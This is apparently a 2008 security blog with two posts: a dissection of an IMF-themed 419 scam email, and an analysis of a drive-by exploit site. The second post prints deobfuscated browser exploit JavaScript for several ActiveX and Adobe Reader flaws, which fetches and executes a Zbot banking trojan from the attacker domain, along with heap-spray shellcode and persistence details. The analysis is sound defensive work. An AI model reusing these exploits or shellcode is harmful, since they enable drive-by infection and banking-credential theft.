Sunday, December 21, 2008

IMF 419 Scam

419 and other advance-fee fraud scams are a regular part of life in the email world. I like to dig through my spam boxes to see what nuggets come up. A recent email with the subject "ECONOMIC STORM" indicated the "IMF international monetary fund and the world bank have collaborated to tackle the global economic storm facing the world." I'm glad to see someone is working to fix the economic crisis.

The email is spoofed from Mr.Dominique Strauss-Kahn and originates from the CHINANET-GD registered IP The email request the reply go to


Received: by with SMTP id s1cs313745fgb;
Sat, 20 Dec 2008 10:36:07 -0800 (PST)
Received: by with SMTP id s1mr2802117wad.118.1229798166053;
Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Received: from pfyq6 ([])
by with SMTP id k21si16564504waf.32.2008.;
Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Received-SPF: neutral ( is neither permitted nor denied by best guess record for domain of client-ip=;
Authentication-Results:; spf=neutral ( is neither permitted nor denied by best guess record for domain of
Message-Id: <>
From: "Mr.Dominique Strauss-Kahn"
Content-Type: text/plain;
Date: Sun, 21 Dec 2008 02:36:04 +0800
X-Priority: 3

This is to inform you/your company that IMF international monetary fund and the
world bank have collaborated to tackle the global economic storm facing
the world.
These authority have set aside the sum of USD 10,000,000,000 ( Ten Billion
United State Dollars ) to finance individuals/companies around the globe
who have a reasonable project.
All applicant should send their full data and project details (project name,
project purpose,project cost) to the address given below to apply the
support for your project.

Reply to Mr. John Condo
Project Finance Section
IMF Office Beijing China
( )

Yours sincerely,
Mr.Dominique Strauss-Kahn
Managing Director, IMF

The email attempts to validate itself by including a hyperlink to the bio of Mr.Dominique Strauss-Kahn. The only problem is the link points to the bio of Mr. Rodrigo de Rato, from Spain, who was the former Managing Director from June 7, 2004 to October 31, 2007.

Even the scammers can't keep up over time. It's amazing to security practitioners that these scams work, but at the same time we've all been asked by someone about the legitimacy of a virus hoax, 419, lottery, or chain email. you wouldn't think it's that profitable, but every once in a while, the scammers hit a goldmine. For example, Bruce Schneier recently blogged about a woman who lost $400K in a 419 scam. All I can say is i'm looking forward to my slice of the $10 Billion. WoooHooo!!!

Friday, December 19, 2008 Exploit Analysis

The analysis of exploit code hosted at results in the typical TTP that includes malicious obfuscated JavaScript, browser-based IE exploits, banking credential stealing malware and ISPs with dubious reputations. The story follows...

A request for returns 3 sections of obfuscated exploit code and an iframe for hxxp://soft4youupdat(dot)org.

<script>opdYzUDi=document.location.href;if(opdYzUDi.indexOf('http://')!=-1){eval('Tgwm\x61Tgwm\x7aTgwm…….truncated…….\x7bTgwm\x7dTgwm\x7d'.replace(/Tgwm/g, ''));}</script>

<script>ftXokBk6=document.location.href;if(ftXokBk6.indexOf('http://')!=-1){eval('qyT\x66qyT\x75qyT…….truncated…….\x7bqyT\x7dqyT\x7d'.replace(/qyT/g, ''));}</script>

<html><iframe src="hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf" widht="1" height="1"></iframe></html>

<script>hu7AMj=document.location.href;if(hu7AMj.indexOf('http://')!=-1){eval('MZnVp\x76MZnVp\x61MZnVp…….truncated…….\x28MZnVp\x29MZnVp\x3b'.replace(/MZnVp/g, ''));}</script>

The JavaScript replace() Method is used to obfuscate the exploit code. The replace() Method syntax is


A 'g' flag is used to perform a global search and an 'i' flag is used to perform a case-insensitive search.

Exploit Block 1
The first block of exploit code globally replaces the characters Tgwm with the empty string ". The decoded section returns a string of escaped hexadecimal characters.


The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.

az = new Array();az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(i = 0; i <= az.length - 1; i++){ start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));}function start(sUrl, sPath) { var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try { var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); try { t.type = 1;'GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), sUrl, false);q.send();; t.write(q.responseBody); t.savetofile(sPath,2); t.close();} catch(e) {}try { s.shellexecute(sPath); if(shellexecute=true) { var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));'G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + Math.random()); b.send(null); }} catch(e){}} catch(e){}}

Exploit Block 2

The second block of exploit code uses the same obfuscation technique decoding to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code. The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().

function killErrors() { return true; } window.onerror = killErrors; var x; var obj;var myarr = new Array(); myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';setTimeout('window.location = "ldap://"', 5000);for (x in myarr){obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();var buf2 = myarr[x]; obj.Zoom = 0;obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot();}catch(e){}}

Exploit Block 3
The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeted against a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus which provides desktop publishing for Linux/Unix. Scribus provides a step by step guide for beginning to enhance PDF with JavaScript. The creation date is 8-6-08.

13 0 obj

[filter FlateDecode has been applied to the JavaScript bitstream]

12 0 obj
14 0 obj
/Producer (Scribus PDF Library
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)

The tool Pdftk - the PDF Toolkit can be used to inflate the FlateDecode JavaScript. The tool syntax is:

pdftk input.pdf output output.pdf uncompress

The exploit shellcode payload is a GET request for hxxp://soft4youupdat(dot)org/counts/load.php?pdf=35f4a8d465e6e1edc05f3d8ab658c551.

function rvcfcd208495d565e()
var rvc4ca4238a0b9238 = new Array();

function rvc81e728d9d4c2f6(rveccbc87e4b5ce2f, rva87ff679a2f3e71)
while (rveccbc87e4b5ce2f.length * 2 < rveccbc87e4b5ce2f =" rveccbc87e4b5ce2f.substring(0," rv1679091c5a880fa =" 0x0c0c0c0c;" rv8f14e45fceea167 =" unescape(" rvc9f0f895fb98ab9 =" 0x400000;" rv45c48cce2e2d7fb =" rv8f14e45fceea167.length" rva87ff679a2f3e71 =" rvc9f0f895fb98ab9" rveccbc87e4b5ce2f =" unescape(" rveccbc87e4b5ce2f =" rvc81e728d9d4c2f6(rveccbc87e4b5ce2f," rvd3d9446802a4425 =" (rv1679091c5a880fa" rv6512bd43d9caa6e =" 0;" rvc51ce410c124a10 =" app.viewerVersion.toString();" rvc51ce410c124a10 =" rvc51ce410c124a10.replace(/\D/g," rvaab3238922bcc25 =" new" rv9bf31c7ff062936 =" unescape(" collabstore =" Collab.collectEmailInfo({subj:">

Exploit Block 4
The fourth block of exploit code uses the same obfuscation technique decoding to reveal 3 buffer overflow exploits:

• COM Object Instantiation Memory Corruption Vulnerability (CVE-2005-2127, MS05-052)
• Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018
• Microsoft Visual Studio 'Msmask32.ocx' ActiveX Control Remote Buffer Overflow Vulnerability (MS08-070)

The shellcode payload for all 3 exploits is hxxp://soft4youupdat(dot)org/counts/load.php?bof=3c59dc048e8850243be8079a5c74d079.

var Shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u732F%u666F%u3474%u6F79%u7575%u6470%u7461%u6F2E%u6772%u632F%u756F%u746E%u2F73%u6F6C%u6461%u702E%u7068%u623F%u666F%u333D%u3563%u6439%u3063%u3834%u3865%u3538%u3230%u3334%u6562%u3038%u3937%u3561%u3763%u6434%u3730%u0039");function geSpyrrSlirrdep(sssprassydddbSliiide, saruuysaddize){while (sssprassydddbSliiide.length * 2 < sssprassydddbsliiide =" sssprassydddbSliiide.substring(0," hpsdyytttscess =" 0x0c0c0c0c;var" hadttdtsize =" 0x400000;var" payfdlytyusade =" Shellcode.length" tggter =" payfdLytyusade" saruuysaddize =" hadttdtSize" sssprassydddbsliiide =" unescape(" prrerat =" new" sssprassydddbsliiide =" geSpyrrSlirrdep(sssprassydddbSliiide," kilrrer =" hpsdyytttscess" hsttiicks =" kilrrer" i =" 0;" ugric =" unescape(" xyz =" 0x40000;while(ugric.length" ugric =" ugric.substring(0," bublic =" new" i =" bublic;">');zorro = Math.ceil(0xd0d0d0d);zorro = document.scripts[0].createControlRange().length;}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement("object");mmed.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");var mms="";for(var i=0; i < body =" '';var buf1 = '';for (i = 1; i <= 1945; i++){buf1 = buf1 + unescape(" href="">

Malware Analysis
The payload for all of the soft4youupdat(dot)org exploits is the same binary file.

Filename: bin_default.exe/default.exe
MD5: d9b7bf5b02fa9d1fc9da041916ff0a5e
Size: 59,392 bytes

The malware is a Zbot trojan which steals online banking information and downloads additional malware.

The following files are created:

308,736 bytes


The following registry key is created to launch the malware at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] Userinit = "%System%\userinit.exe,%System%\ntos.exe,"

Virus total indicates a low detection rate for this particular variant at the time of analysis [Result: 9/38 (23.68%)]

Domain Analysis
The domain was registered 11-20-08 at Everyones Internet, Ltd.

Domain ID:D154732571-LROR Domain

Created On:20-Nov-2008 12:59:45 UTC
Last Updated On:20-Nov-2008 13:19:16 UTC
Expiration Date:20-Nov-2009 12:59:45 UTC
Sponsoring Registrar:Everyones Internet, Ltd. (R1381-LROR)
Registrant ID:tul8MyjB2Dv7rqIF
Registrant Name:Vladimir Mashkov
Registrant Organization:N/A
Registrant Street1:st. Lenin's 56 square 43
Registrant Street2:
Registrant Street3:
Registrant City:Moscow
Registrant State/Province:Moscow
Registrant Postal Code:10010
Registrant Country:RU
Registrant Phone:+7.4950784576
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:

The domain currently resolves to which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351,

aut-num: AS36351
as-name: SOFTLAYER
descr: SoftLayer Technologies Inc.
import: from AS-ANY accept ANY AND NOT {}
export: to AS-ANY announce AS36351
admin-c: IPADM258-ARIN
tech-c: IPADM258-ARIN
mnt-by: MAINT-AS36351
changed: 20060110
source: RADB

SOFTLAYER Technologies Inc leased IP space to Innovation IT Solutions Corp which is an international communications company headquartered in London, UK.

Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1) -

SOFTLAYER Technologies Inc is listed by in their top 10 worst network block owners and the McColo Cyber Crime USA – V2.0 report lists the ISP in the top 5 worst network block owners. Both IT Solutions Corp and SOFTLAYER Technologies Inc have been previously tied to RBN activity and the Russian Cyberwar on Georgia.